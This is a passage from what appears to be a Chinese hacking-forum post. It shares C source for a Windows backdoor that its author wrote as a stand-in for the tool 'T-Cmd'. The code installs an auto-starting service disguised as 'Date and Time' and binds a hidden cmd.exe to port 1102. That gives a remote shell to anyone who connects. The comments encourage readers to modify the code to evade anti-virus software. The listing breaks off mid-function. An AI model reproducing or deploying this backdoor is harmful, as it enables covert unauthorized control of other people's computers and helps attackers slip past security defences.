如果要改的话(最好是改一下),把那个BindCmd2Port函数整个改掉吧,我都记不得是哪里paste过来的了。
写得匆忙,主要是急着用。本来很喜欢T-Cmd的,可是没有源代码看,只好自己写,抛砖而已,大家有玉请砸过来。
在Windows2000 Pro(???)正常(?)运行。
/*
This program creates a service which binds a
cmd.exe to port 1102(can be easily defined by
yourself). Try to modify it to escape from the
anti-virus software.
Try not paste the paste-up elsewhere.
by N.E.V.E.R@SEU
*/
#include \"windows.h\"
#include \"stdio.h\"
#pragma comment (lib, \"WS2_32.lib\")
//Global Variables
int port=1102;
//Listening port, 1 ~ 65535 as you like
char ServicesName[255]=\"Date and Time\";
//Service name, name it Bill Gate\''s Backdoor?
char ServicesDisplayName[255]=\"Date and Time\";
//Service display name
HANDLE hTerminateEvent = NULL;
SERVICE_STATUS_HANDLE hServiceStatus;
BOOL bPauseService = FALSE;
BOOL bRunningService = FALSE;
HANDLE hThread = NULL;
DWORD BindCmd2Port(LPVOID);
BOOL SendStatusToSCM(DWORD, DWORD, DWORD, DWORD, DWORD);
BOOL InitService();
VOID Handler (DWORD);
VOID terminate(DWORD);
VOID ServiceMain(DWORD, LPTSTR*);
void main(int argc, char* argv[])
{
if(argc==2&&!strcmp(argv[1],\"/install\"))
{
char binaryPathName[_MAX_PATH];
char tmp[255]=\"net start \\\"\";
strcat(tmp,ServicesName);
strcat(tmp,\"\\\"\");
GetModuleFileName(NULL,binaryPathName,_MAX_PATH);
SC_HANDLE s = OpenSCManager(0, 0, SC_MANAGER_CREATE_SERVICE);
SC_HANDLE hNewService = CreateService(s, ServicesName, ServicesDisplayName,
SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS,
SERVICE_AUTO_START, SERVICE_ERROR_NORMAL,
binaryPathName, NULL, NULL, NULL, NULL, NULL);
if(!hNewService)
printf(\"Error Creating Services...\");
else
WinExec(tmp,0);
Sleep(4000);
CloseServiceHandle(hNewService);
CloseServiceHandle(s);
return;
}
SERVICE_TABLE_ENTRY serviceTable[] =
{
{ ServicesName, (LPSERVICE_MAIN_FUNCTION) ServiceMain},
{ NULL, NULL }
};
if(!StartServiceCtrlDispatcher(serviceTable))
{
printf(\"Failed at StartServiceCtrlDispatcher..\\n\");
printf(\"or you run this .exe directly? Try \\n %s /install\",argv[0]);
return;
}
}
DWORD BindCmd2Port(LPVOID lp)
{
char cmdLine[] = \"cmd.exe\";
SOCKET s=INVALID_SOCKET;
WSADATA WSAData;
int ret;
char Buff[2048];
HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;
unsigned long lBytesRead;
SECURITY_ATTRIBUTES sa;
if (WSAStartup(MAKEWORD(2,2), &WSAData)!=0)
return 0;
if((s=socket(AF_INET, SOCK_STREAM, 0))==INVALID_SOCKET)
{
closesocket(s);
WSACleanup();
return 0;
}
sockaddr_in addr;
addr.sin_family = AF_INET;
addr.sin_addr.S_un.S_addr = htonl(INADDR_ANY);
addr.sin_port = htons(port);
if(bind(s,(sockaddr*)&addr,sizeof(addr))==SOCKET_ERROR)
return 0;
if(listen(s,1)==SOCKET_ERROR)
return 0;
int temp=sizeof(addr);
while(1){
s=accept(s,(sockaddr*)&addr,&temp);
sa.nLength=12;
sa.lpSecurityDescriptor=0;
sa.bInheritHandle=TRUE;
CreatePipe(&hReadPipe1,&hWritePipe1,&sa,0);
CreatePipe(&hReadPipe2,&hWritePipe2,&sa,0);
STARTUPINFO siinfo;
PROCESS_INFORMATION ProcessInformation;
ZeroMemory(&siinfo,sizeof(siinfo));
siinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
siinfo.wShowWindow = SW_HIDE;